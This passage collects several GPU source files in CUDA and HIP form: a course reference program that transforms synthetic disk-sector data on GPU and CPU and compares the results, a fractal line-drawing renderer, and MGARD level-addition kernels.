gridDimZ, blockDimX, blockDimY, blockDimZ, get_delta_time ()); // copy kernel result back to host side unsigned int *modified_device_sector_data; modified_device_sector_data = (unsigned int *) malloc (sector_data_size); CHECK (hipMemcpy (modified_device_sector_data, device_sector_data, sector_data_size, hipMemcpyDeviceToHost)); printf ("The transfer of %ld bytes from the device to the host took %.3e seconds\n", (long) sector_data_size, get_delta_time ()); // free device global memory CHECK (hipFree (device_sector_data)); CHECK (hipFree (device_sector_number)); // reset device CHECK (hipDeviceReset ()); // compute the modified sector data on the CPU (void) get_delta_time (); for (i = 0; i < N_SECTORS; i++) modify_sector_cpu_kernel (&host_sector_data[i*SECTOR_SIZE/(sizeof (unsigned int))], host_sector_number[i], n_sectors, sector_size); printf("The cpu kernel took %.3e seconds to run (single core)\n",get_delta_time ()); // compare for(i = 0; i < (int) sector_data_size / (int) sizeof (unsigned int); i++) if (host_sector_data[i] != modified_device_sector_data[i]) { int sector_words = sector_size / (int) sizeof (unsigned int); printf ("Mismatch in sector %d, word %d\n", i / sector_words, i % sector_words); exit(1); } printf ("All is well!\n"); // free host memory free (host_sector_data); free (host_sector_number); free (modified_device_sector_data); return 0; } static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, i, a, c, n_words; // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) n_words = sector_size / 4u; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; // modify the sector data } } __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, y, idx, i, a, c, n_words; // compute the thread number x = (unsigned int) threadIdx.x + (unsigned int) blockDim.x * (unsigned int) blockIdx.x; y = (unsigned int) threadIdx.y + (unsigned int) blockDim.y * (unsigned int) blockIdx.y; idx = (unsigned int) blockDim.x * (unsigned int) gridDim.x * y + x; if (idx >= n_sectors) return; // safety precaution // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) // and define boundaries n_words = sector_size / 4u; // adjust pointers sector_data += n_words * idx; sector_number += idx; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number[0]; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; } } static double get_delta_time(void) { static struct timespec t0,t1; t0 = t1; if(clock_gettime(CLOCK_MONOTONIC,&t1) != 0) { perror("clock_gettime"); exit(1); } return (double)(t1.tv_sec - t0.tv_sec) + 1.0e-9 * (double)(t1.tv_nsec - t0.tv_nsec); }
9120fe38d32f8885d391d1bf984a6dade7c14e5f.cu
// // Tomás Oliveira e Silva / António Rui Borges // // ACA 2019/2020 // // Reference implementation 1 // #include <time.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include "common.h" #include <cuda_runtime.h> //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // program configuration // #ifndef SECTOR_SIZE # define SECTOR_SIZE 512 #endif #ifndef N_SECTORS # define N_SECTORS (1 << 21) #endif static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size); __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size); static double get_delta_time(void); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Main program // int main (int argc, char **argv) { printf("%s Starting...\n", argv[0]); if (sizeof (unsigned int) != (size_t) 4) return 1; // fail with prejudice if an integer does not have 4 bytes // set up device int dev = 0; int i; cudaDeviceProp deviceProp; CHECK (cudaGetDeviceProperties (&deviceProp, dev)); printf("Using Device %d: %s\n", dev, deviceProp.name); CHECK (cudaSetDevice (dev)); // create memory areas in host and device memory where the disk sectors data and sector numbers will be stored size_t sector_data_size; size_t sector_number_size; unsigned int *host_sector_data, *host_sector_number; unsigned int *device_sector_data, *device_sector_number; sector_data_size = (size_t) N_SECTORS * (size_t) SECTOR_SIZE; sector_number_size = (size_t) N_SECTORS * sizeof (unsigned int); if ((sector_data_size + sector_number_size) > (size_t) 1.3e9) { fprintf (stderr,"The GTX 1060 cannot handle more than 5.5GiB of memory!\n"); exit (1); } printf ("Total sector data size: %lu\n", sector_data_size); printf ("Total sector numbers data size: %lu\n", sector_number_size); host_sector_data = (unsigned int *) malloc (sector_data_size); host_sector_number = (unsigned int *) malloc (sector_number_size); CHECK (cudaMalloc ((void **) &device_sector_data, sector_data_size)); CHECK (cudaMalloc ((void **) &device_sector_number, sector_number_size)); // initialize the host data (void) get_delta_time (); srand(0xACA2019); for (i = 0; i < (int) (sector_data_size / (int) sizeof(unsigned int)); i++) host_sector_data[i] = 108584447u * (unsigned int) i; // "pseudo-random" data (faster than using the rand() function) for(i = 0; i < (int) (sector_number_size / (int)sizeof(unsigned int)); i++) host_sector_number[i] = (rand () & 0xFFFF) | ((rand () & 0xFFFF) << 16); printf ("The initialization of host data took %.3e seconds\n",get_delta_time ()); // copy the host data to the device memory (void) get_delta_time (); CHECK (cudaMemcpy (device_sector_data, host_sector_data, sector_data_size, cudaMemcpyHostToDevice)); CHECK (cudaMemcpy (device_sector_number, host_sector_number, sector_number_size, cudaMemcpyHostToDevice)); printf ("The transfer of %ld bytes from the host to the device took %.3e seconds\n", (long) sector_data_size + (long) sector_number_size, get_delta_time ()); // run the computational kernel // as an example, N_SECTORS threads are launched where each thread deals with one sector unsigned int gridDimX,gridDimY,gridDimZ,blockDimX,blockDimY,blockDimZ; int n_sectors, sector_size; n_sectors = N_SECTORS; sector_size = SECTOR_SIZE; blockDimX = 1 << 0; // optimize! blockDimY = 1 << 3; // optimize! blockDimZ = 1; // optimize! gridDimX = 1 << 12; // optimize! gridDimY = 1 << 6; // optimize! gridDimZ = 1; // optimize! if ((blockDimX * blockDimY * blockDimZ * gridDimX * gridDimY * gridDimZ) != N_SECTORS) { fprintf (stderr,"Wrong launch configuration!\n"); exit (1); } dim3 grid (gridDimX, gridDimY, gridDimZ); dim3 block (blockDimX, blockDimY, blockDimZ); (void) get_delta_time (); modify_sector_cuda_kernel <<<grid, block>>> (device_sector_data, device_sector_number, n_sectors, sector_size); CHECK (cudaDeviceSynchronize ()); // wait for kernel to finish CHECK (cudaGetLastError ()); // check for kernel errors printf("The CUDA kernel <<<(%d,%d,%d), (%d,%d,%d)>>> took %.3e seconds to run\n", gridDimX, gridDimY, gridDimZ, blockDimX, blockDimY, blockDimZ, get_delta_time ()); // copy kernel result back to host side unsigned int *modified_device_sector_data; modified_device_sector_data = (unsigned int *) malloc (sector_data_size); CHECK (cudaMemcpy (modified_device_sector_data, device_sector_data, sector_data_size, cudaMemcpyDeviceToHost)); printf ("The transfer of %ld bytes from the device to the host took %.3e seconds\n", (long) sector_data_size, get_delta_time ()); // free device global memory CHECK (cudaFree (device_sector_data)); CHECK (cudaFree (device_sector_number)); // reset device CHECK (cudaDeviceReset ()); // compute the modified sector data on the CPU (void) get_delta_time (); for (i = 0; i < N_SECTORS; i++) modify_sector_cpu_kernel (&host_sector_data[i*SECTOR_SIZE/(sizeof (unsigned int))], host_sector_number[i], n_sectors, sector_size); printf("The cpu kernel took %.3e seconds to run (single core)\n",get_delta_time ()); // compare for(i = 0; i < (int) sector_data_size / (int) sizeof (unsigned int); i++) if (host_sector_data[i] != modified_device_sector_data[i]) { int sector_words = sector_size / (int) sizeof (unsigned int); printf ("Mismatch in sector %d, word %d\n", i / sector_words, i % sector_words); exit(1); } printf ("All is well!\n"); // free host memory free (host_sector_data); free (host_sector_number); free (modified_device_sector_data); return 0; } static void modify_sector_cpu_kernel (unsigned int *sector_data, unsigned int sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, i, a, c, n_words; // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) n_words = sector_size / 4u; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; // modify the sector data } } __global__ static void modify_sector_cuda_kernel (unsigned int * __restrict__ sector_data, unsigned int * __restrict__ sector_number, unsigned int n_sectors, unsigned int sector_size) { unsigned int x, y, idx, i, a, c, n_words; // compute the thread number x = (unsigned int) threadIdx.x + (unsigned int) blockDim.x * (unsigned int) blockIdx.x; y = (unsigned int) threadIdx.y + (unsigned int) blockDim.y * (unsigned int) blockIdx.y; idx = (unsigned int) blockDim.x * (unsigned int) gridDim.x * y + x; if (idx >= n_sectors) return; // safety precaution // convert the sector size into number of 4-byte words (it is assumed that sizeof(unsigned int) = 4) // and define boundaries n_words = sector_size / 4u; // adjust pointers sector_data += n_words * idx; sector_number += idx; // initialize the linear congruencial pseudo-random number generator // (section 3.2.1.2 of The Art of Computer Programming presents the theory behind the restrictions on a and c) i = sector_number[0]; // get the sector number a = 0xACA00001u ^ ((i & 0x0F0F0F0Fu) << 2); // a must be a multiple of 4 plus 1 c = 0x00ACA001u ^ ((i & 0xF0F0F0F0u) >> 3); // c must be odd x = 0xACA02019u; // initial state // modify the sector data for (i = 0u; i < n_words; i++) { x = a * x + c; // update the pseudo-random generator state sector_data[i] ^= x; } } static double get_delta_time(void) { static struct timespec t0,t1; t0 = t1; if(clock_gettime(CLOCK_MONOTONIC,&t1) != 0) { perror("clock_gettime"); exit(1); } return (double)(t1.tv_sec - t0.tv_sec) + 1.0e-9 * (double)(t1.tv_nsec - t0.tv_nsec); }
1428a7c2d9892b49f8c0a78b7657e4f19e8a1da5.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <iostream> #include <time.h> #include <iomanip> #include <cmath> #include <cudaErrors.h> #include <thrust/complex.h> #include <ImageHelper.h> __device__ double distance(double x1,double y1,double x2,double y2) { return sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } __global__ void Line(unsigned int nx,unsigned int ny,double px1,double py1,double px2,double py2,double thickness,PixelInfo *img){ int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; if(i >= nx || j >= ny){ return; } // if(px1 < px2+thickness && px2 < px1+thickness) { // printf("%d %d - %d %d",px1,py1,px2,py2); // printf("(abs(i-px1) <= thickness || abs(i-px2) <= thickness) : %d",(abs(i-px1) <= thickness || abs(i-px2) <= thickness)); // printf("(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) : %d",(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)); // } //Slope infinite if (px1 < px2+thickness && px2 < px1+thickness && (abs(i-px1) <= thickness || abs(i-px2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; return; } else if (px1 == px2) { return; } // Takes care of all slopes except px2 = px1 case double m = double(py2-py1)/double(px2-px1); // y-y1 = m * (x-x1) // y-y2 = m * (x-x2) double j_approx1 = m * i - m * px1 + py1; double j_approx2 = m * i - m * px2 + py2; if ( (abs(j-j_approx1) <= thickness || abs(j-j_approx2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) ){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; } } struct Point { double x; double y; }; Point operator / (const Point& obj,double s){ return {obj.x/s , obj.y/s}; } Point operator + (const Point& obj1,const Point& obj2){ return {obj1.x + obj2.x , obj1.y + obj2.y}; } Point operator - (const Point& obj){ return {-obj.x, -obj.y}; } Point operator * (const Point& obj,double s){ return {obj.x*s , obj.y*s}; } double distance (const Point& obj1,const Point& obj2){ return sqrt((obj1.x-obj2.x)*(obj1.x-obj2.x) + (obj1.y-obj2.y)*(obj1.y-obj2.y)); } std::ostream& operator << (std::ostream& out ,const Point& obj){ out << obj.x << " " << obj.y << " " ; return out; } struct Quad { Point p1; Point p2; Point p3; Point p4; }; unsigned int nx = 1200; unsigned int ny = 1200; unsigned int tx = 8; unsigned int ty = 4; Point rotate(Point p,double theta) { theta = M_PI * theta / 180.0; // convert to radian Point p_new; p_new.x = p.x*cos(theta) - p.y*sin(theta); p_new.y = p.y*cos(theta) + p.x*sin(theta); return p_new; } Point translate(Point p,Point new_origin) { Point p_new; p_new.x = p.x - new_origin.x; p_new.y = p.y - new_origin.y; return p_new; } void drawTest(Quad t,int curr_depth,int max_depth,int theta,PixelInfo* window){ if(curr_depth >= max_depth) return; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); t.p2.x = t.p1.x + (t.p4.x-t.p1.x)*1.0/3; t.p3.x = t.p1.x + (t.p4.x-t.p1.x)*2.0/3; t.p2.y = t.p1.y + (t.p4.y-t.p1.y)*1.0/3; t.p3.y = t.p1.y + (t.p4.y-t.p1.y)*2.0/3; Point mp = translate(rotate(translate(t.p3,t.p2),theta),-t.p2); //std::cout << t.p1 << t.p2 << mp << t.p3 << t.p4 << std::endl; hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,t.p1.x,t.p1.y,t.p2.x,t.p2.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,t.p2.x,t.p2.y,mp.x,mp.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,mp.x,mp.y,t.p3.x,t.p3.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); hipLaunchKernelGGL(( Line), dim3(blocks),dim3(threads), 0, 0, nx,ny,t.p3.x,t.p3.y,t.p4.x,t.p4.y,1,window); checkCudaErrors(hipGetLastError()); checkCudaErrors(hipDeviceSynchronize()); Quad nt1; Quad nt2; Quad nt3; Quad nt4; nt1.p1 = t.p1; nt1.p4 = t.p2; nt2.p1 = t.p2; nt2.p4 = mp; nt3.p1 = mp; nt3.p4 = t.p3; nt4.p1 = t.p3; nt4.p4 = t.p4; drawTest(nt1,curr_depth+1,max_depth,theta,window); drawTest(nt2,curr_depth+1,max_depth,theta,window); drawTest(nt3,curr_depth+1,max_depth,theta,window); drawTest(nt4,curr_depth+1,max_depth,theta,window); drawTest(nt1,curr_depth+1,max_depth,-theta,window); drawTest(nt2,curr_depth+1,max_depth,-theta,window); drawTest(nt3,curr_depth+1,max_depth,-theta,window); drawTest(nt4,curr_depth+1,max_depth,-theta,window); } int main() { Point p[3]; Quad inital_quad[3]; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); // Alloc Img // PixelInfo *img; checkCudaErrors(hipMallocManaged((void **)&img,nx*ny*sizeof(PixelInfo))); for(int step=0; step < 3; step++){ p[step].x = nx/2.0 + cos(2.0*M_PI/double(3)*step)*nx/2.0; p[step].y = ny/2.0 + sin(2.0*M_PI/double(3)*step)*ny/2.0; //printf("%d %lf - %lf %lf\n",step,2*M_PI/double(shape_pts.n)*step,shape_pts.p[step].x,shape_pts.p[step].y ); } inital_quad[0].p1 = p[0]; inital_quad[0].p4 = p[1]; inital_quad[1].p1 = p[1]; inital_quad[1].p4 = p[2]; inital_quad[2].p1 = p[2]; inital_quad[2].p4 = p[3]; int n = 6; for(int depth=0;depth<n;depth++) { drawTest(inital_quad[0],0,depth,60,img); drawTest(inital_quad[1],0,depth,60,img); drawTest(inital_quad[2],0,depth,60,img); drawTest(inital_quad[0],0,depth,-60,img); drawTest(inital_quad[1],0,depth,-60,img); drawTest(inital_quad[2],0,depth,-60,img); // Save Img // std::stringstream ss; ss << "./save_folder/Img-" << std::setfill('0') << std::setw(5) << depth << ".jpg"; saveImage(img,nx,ny,ss.str().c_str()); } // Clean Up // checkCudaErrors(hipFree(img)); return 0; }
1428a7c2d9892b49f8c0a78b7657e4f19e8a1da5.cu
#include <stdio.h> #include <iostream> #include <time.h> #include <iomanip> #include <cmath> #include <cudaErrors.h> #include <thrust/complex.h> #include <ImageHelper.h> __device__ double distance(double x1,double y1,double x2,double y2) { return sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } __global__ void Line(unsigned int nx,unsigned int ny,double px1,double py1,double px2,double py2,double thickness,PixelInfo *img){ int i = threadIdx.x + blockIdx.x * blockDim.x; int j = threadIdx.y + blockIdx.y * blockDim.y; if(i >= nx || j >= ny){ return; } // if(px1 < px2+thickness && px2 < px1+thickness) { // printf("%d %d - %d %d",px1,py1,px2,py2); // printf("(abs(i-px1) <= thickness || abs(i-px2) <= thickness) : %d",(abs(i-px1) <= thickness || abs(i-px2) <= thickness)); // printf("(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) : %d",(distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)); // } //Slope infinite if (px1 < px2+thickness && px2 < px1+thickness && (abs(i-px1) <= thickness || abs(i-px2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness)){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; return; } else if (px1 == px2) { return; } // Takes care of all slopes except px2 = px1 case double m = double(py2-py1)/double(px2-px1); // y-y1 = m * (x-x1) // y-y2 = m * (x-x2) double j_approx1 = m * i - m * px1 + py1; double j_approx2 = m * i - m * px2 + py2; if ( (abs(j-j_approx1) <= thickness || abs(j-j_approx2) <= thickness) && (distance(px1,py1,i,j) + distance(px2,py2,i,j) <= distance(px1,py1,px2,py2) + 1.4142135623730951 * thickness) ){ img[j*nx+i].r = 255; img[j*nx+i].g = 255; img[j*nx+i].b = 255; } } struct Point { double x; double y; }; Point operator / (const Point& obj,double s){ return {obj.x/s , obj.y/s}; } Point operator + (const Point& obj1,const Point& obj2){ return {obj1.x + obj2.x , obj1.y + obj2.y}; } Point operator - (const Point& obj){ return {-obj.x, -obj.y}; } Point operator * (const Point& obj,double s){ return {obj.x*s , obj.y*s}; } double distance (const Point& obj1,const Point& obj2){ return sqrt((obj1.x-obj2.x)*(obj1.x-obj2.x) + (obj1.y-obj2.y)*(obj1.y-obj2.y)); } std::ostream& operator << (std::ostream& out ,const Point& obj){ out << obj.x << " " << obj.y << " " ; return out; } struct Quad { Point p1; Point p2; Point p3; Point p4; }; unsigned int nx = 1200; unsigned int ny = 1200; unsigned int tx = 8; unsigned int ty = 4; Point rotate(Point p,double theta) { theta = M_PI * theta / 180.0; // convert to radian Point p_new; p_new.x = p.x*cos(theta) - p.y*sin(theta); p_new.y = p.y*cos(theta) + p.x*sin(theta); return p_new; } Point translate(Point p,Point new_origin) { Point p_new; p_new.x = p.x - new_origin.x; p_new.y = p.y - new_origin.y; return p_new; } void drawTest(Quad t,int curr_depth,int max_depth,int theta,PixelInfo* window){ if(curr_depth >= max_depth) return; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); t.p2.x = t.p1.x + (t.p4.x-t.p1.x)*1.0/3; t.p3.x = t.p1.x + (t.p4.x-t.p1.x)*2.0/3; t.p2.y = t.p1.y + (t.p4.y-t.p1.y)*1.0/3; t.p3.y = t.p1.y + (t.p4.y-t.p1.y)*2.0/3; Point mp = translate(rotate(translate(t.p3,t.p2),theta),-t.p2); //std::cout << t.p1 << t.p2 << mp << t.p3 << t.p4 << std::endl; Line<<<blocks,threads>>>(nx,ny,t.p1.x,t.p1.y,t.p2.x,t.p2.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Line<<<blocks,threads>>>(nx,ny,t.p2.x,t.p2.y,mp.x,mp.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Line<<<blocks,threads>>>(nx,ny,mp.x,mp.y,t.p3.x,t.p3.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Line<<<blocks,threads>>>(nx,ny,t.p3.x,t.p3.y,t.p4.x,t.p4.y,1,window); checkCudaErrors(cudaGetLastError()); checkCudaErrors(cudaDeviceSynchronize()); Quad nt1; Quad nt2; Quad nt3; Quad nt4; nt1.p1 = t.p1; nt1.p4 = t.p2; nt2.p1 = t.p2; nt2.p4 = mp; nt3.p1 = mp; nt3.p4 = t.p3; nt4.p1 = t.p3; nt4.p4 = t.p4; drawTest(nt1,curr_depth+1,max_depth,theta,window); drawTest(nt2,curr_depth+1,max_depth,theta,window); drawTest(nt3,curr_depth+1,max_depth,theta,window); drawTest(nt4,curr_depth+1,max_depth,theta,window); drawTest(nt1,curr_depth+1,max_depth,-theta,window); drawTest(nt2,curr_depth+1,max_depth,-theta,window); drawTest(nt3,curr_depth+1,max_depth,-theta,window); drawTest(nt4,curr_depth+1,max_depth,-theta,window); } int main() { Point p[3]; Quad inital_quad[3]; dim3 blocks(nx/tx+1,ny/ty+1); dim3 threads(tx,ty); // Alloc Img // PixelInfo *img; checkCudaErrors(cudaMallocManaged((void **)&img,nx*ny*sizeof(PixelInfo))); for(int step=0; step < 3; step++){ p[step].x = nx/2.0 + cos(2.0*M_PI/double(3)*step)*nx/2.0; p[step].y = ny/2.0 + sin(2.0*M_PI/double(3)*step)*ny/2.0; //printf("%d %lf - %lf %lf\n",step,2*M_PI/double(shape_pts.n)*step,shape_pts.p[step].x,shape_pts.p[step].y ); } inital_quad[0].p1 = p[0]; inital_quad[0].p4 = p[1]; inital_quad[1].p1 = p[1]; inital_quad[1].p4 = p[2]; inital_quad[2].p1 = p[2]; inital_quad[2].p4 = p[3]; int n = 6; for(int depth=0;depth<n;depth++) { drawTest(inital_quad[0],0,depth,60,img); drawTest(inital_quad[1],0,depth,60,img); drawTest(inital_quad[2],0,depth,60,img); drawTest(inital_quad[0],0,depth,-60,img); drawTest(inital_quad[1],0,depth,-60,img); drawTest(inital_quad[2],0,depth,-60,img); // Save Img // std::stringstream ss; ss << "./save_folder/Img-" << std::setfill('0') << std::setw(5) << depth << ".jpg"; saveImage(img,nx,ny,ss.str().c_str()); } // Clean Up // checkCudaErrors(cudaFree(img)); return 0; }
4ab851abb27096ef78bfca72cbbab9c925e57b7a.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "cuda/mgard_cuda_add_level.h" #include "cuda/mgard_cuda_common_internal.h" namespace mgard_cuda { template <typename T> __global__ void _add_level(int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *irow, int *icol, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { int r = irow[y]; int c = icol[x]; dv[get_idx(lddv, r, c)] += dwork[get_idx(lddwork, r, c)]; } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); hipLaunchKernelGGL(( _add_level), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nrow, ncol, nr, nc, row_stride, col_stride, dirow, dicol, dv, lddv, dwork, lddwork); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nr, int nc, int row_stride, int col_stride, int *dirow, int *dicol, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level_cpt(int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork) { int idx_x = (blockIdx.x * blockDim.x + threadIdx.x) * col_stride; int idx_y = (blockIdx.y * blockDim.y + threadIdx.y) * row_stride; for (int y = idx_y; y < nr; y += blockDim.y * gridDim.y * row_stride) { for (int x = idx_x; x < nc; x += blockDim.x * gridDim.x * col_stride) { dv[get_idx(lddv, y, x)] += dwork[get_idx(lddwork, y, x)]; } } } template <typename T> void add_level_cpt(mgard_cuda_handle<T> &handle, int nr, int nc, int row_stride, int col_stride, T *dv, int lddv, T *dwork, int lddwork, int queue_idx) { int total_thread_x = nc / col_stride; int total_thread_y = nr / row_stride; int tbx = min(handle.B, total_thread_x); int tby = min(handle.B, total_thread_y); int gridx = ceil((float)total_thread_x / tbx); int gridy = ceil((float)total_thread_y / tby); dim3 threadsPerBlock(tbx, tby); dim3 blockPerGrid(gridx, gridy); hipLaunchKernelGGL(( _add_level_cpt), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nr, nc, row_stride, col_stride, dv, lddv, dwork, lddwork); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level_cpt<double>(mgard_cuda_handle<double> &handle, int nr, int nc, int row_stride, int col_stride, double *dv, int lddv, double *dwork, int lddwork, int queue_idx); template void add_level_cpt<float>(mgard_cuda_handle<float> &handle, int nr, int nc, int row_stride, int col_stride, float *dv, int lddv, float *dwork, int lddwork, int queue_idx); template <typename T> __global__ void _add_level(int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *irow, int *icol, int *ifib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2) { int z0 = blockIdx.z * blockDim.z + threadIdx.z * row_stride; int y0 = blockIdx.y * blockDim.y + threadIdx.y * col_stride; int x0 = blockIdx.x * blockDim.x + threadIdx.x * fib_stride; for (int z = z0; z * row_stride < nr; z += blockDim.z * gridDim.z * row_stride) { for (int y = y0; y * col_stride < nc; y += blockDim.y * gridDim.y * col_stride) { for (int x = x0; x * fib_stride < nf; x += blockDim.x * gridDim.x * fib_stride) { int z_strided = irow[z]; int y_strided = icol[y]; int x_strided = ifib[x]; dv[get_idx(lddv1, lddv2, z_strided, y_strided, x_strided)] += dwork[get_idx(lddwork1, lddwork2, z_strided, y_strided, x_strided)]; } } } } template <typename T> void add_level(mgard_cuda_handle<T> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, T *dv, int lddv1, int lddv2, T *dwork, int lddwork1, int lddwork2, int queue_idx) { int B_adjusted = min(8, handle.B); int total_thread_z = ceil((double)nr / (row_stride)); int total_thread_y = ceil((double)nc / (col_stride)); int total_thread_x = ceil((double)nf / (fib_stride)); int tbz = min(B_adjusted, total_thread_z); int tby = min(B_adjusted, total_thread_y); int tbx = min(B_adjusted, total_thread_x); int gridz = ceil((float)total_thread_z / tbz); int gridy = ceil((float)total_thread_y / tby); int gridx = ceil((float)total_thread_x / tbx); dim3 threadsPerBlock(tbx, tby, tbz); dim3 blockPerGrid(gridx, gridy, gridz); hipLaunchKernelGGL(( _add_level), dim3(blockPerGrid), dim3(threadsPerBlock), 0, *(hipStream_t *)handle.get(queue_idx), nrow, ncol, nfib, nr, nc, nf, row_stride, col_stride, fib_stride, dirow, dicol, difib, dv, lddv1, lddv2, dwork, lddwork1, lddwork2); gpuErrchk(hipGetLastError()); #ifdef MGARD_CUDA_DEBUG gpuErrchk(hipDeviceSynchronize()); #endif } template void add_level<double>(mgard_cuda_handle<double> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, double *dv, int lddv1, int lddv2, double *dwork, int lddwork1, int lddwork2, int queue_idx); template void add_level<float>(mgard_cuda_handle<float> &handle, int nrow, int ncol, int nfib, int nr, int nc, int nf, int row_stride, int col_stride, int fib_stride, int *dirow, int *dicol, int *difib, float *dv, int lddv1, int lddv2, float *dwork, int 